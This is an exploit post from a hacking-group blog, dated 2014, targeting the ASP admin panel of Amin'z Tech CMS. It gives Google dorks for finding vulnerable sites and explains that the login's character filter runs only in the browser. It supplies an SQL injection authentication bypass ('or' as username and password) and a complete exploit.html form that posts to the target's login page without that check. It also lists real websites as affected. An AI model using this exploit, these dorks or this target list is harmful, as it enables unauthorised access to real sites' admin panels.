11 Eylül 2014 Perşembe
Amin'z Tech CMS (asp) - Security bypassed & Auth bypass PoC Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com
############################################################
Turkey Security Group
'h4x0re SECURITY'
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Amin'z Tech CMS
|~Affected Version : ASP
|~Official Web: http://www.aminztech.com/
|~RISK : High
|~Google Keyword/Dorks :
"Developer by Amin' z Tech"
"Desgined By: Amin'z Tech" inurl:asp
|~Tested On : Kali Linux \ Windows XP
########################################################
####################INFO################################
asp version of the script is effective in.
"panel/login.asp" SQL queries can be sent to.
but there is a small problem....
"/panel/" Source code, security were simple;
character does not accept
----------------------
...
Line 17: var iChars = "!@#$%^&*()+=-[]\\\';,./{}|\":<>?";
for (var i = 0; i < document.form2.uname.value.length; i++) {
if (iChars.indexOf(document.form2.uname.value.charAt(i)) != -1) {
alert ("Your Username has special characters. \nThese are not allowed.\n Please remove them and try again.");
return false;
..
..
-----------------
We will destroy them and be able to easily run SQL queries.
########################################################
####################Usage Exploit########################
Exploitation
Edit to exploit.html target website..
Open exploit.html your browser..
Username : 'or'
Password : 'or'
GO TO ADMIN PANEL..
############################################################
Example affected sites & Tested on:
http://www.pak-line.com/
http://www.5glovesind.com
http://www.expo-star.com
http://www.nifarsports.com
www.conversantint.com
http://sssurgimed-intl.com
http://www.mahboobbros.com/panel/login.asp
... etc
==============================================================================00
Admin Panel Security bypassed & auth bypass PoC ; exploit.html
==============================================================================00
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td> </td>
<td width="700" align="center"><form name="form2" id="form2" method="post" action="http://[TARGET]/panel/login.asp" onSubmit="return checkform();">
<table width="400" height="200" border="0" cellpadding="0" cellspacing="0">
<tr align="center">
<td height="30" colspan="3"><strong>Login Infromation</strong></td>
</tr>
<tr>
<td width="93"> </td>
<td width="92">User Name:</td>
<td width="215" height="26"> <input name="uname" type="text" class="textbox" id="uname"></td>
</tr>
<tr>
<td> </td>
<td>Password:</td>
<td height="26"> <input name="pass" type="password" class="textbox" id="pass">
</td>
</tr>
<tr>
<td> </td>
<td> </td>
<td height="30"> <input name="Submit" type="submit" class="btn" value="Login">
</td>
</tr>
<tr align="center" valign="top">
<td colspan="3" class="error"></td>
</tr>
</table>
</form></td>
<td> </td>
</tr>
</table>
</body>
</html>
Kaydol:
Kayıt Yorumları (Atom)
Hiç yorum yok:
Yorum Gönder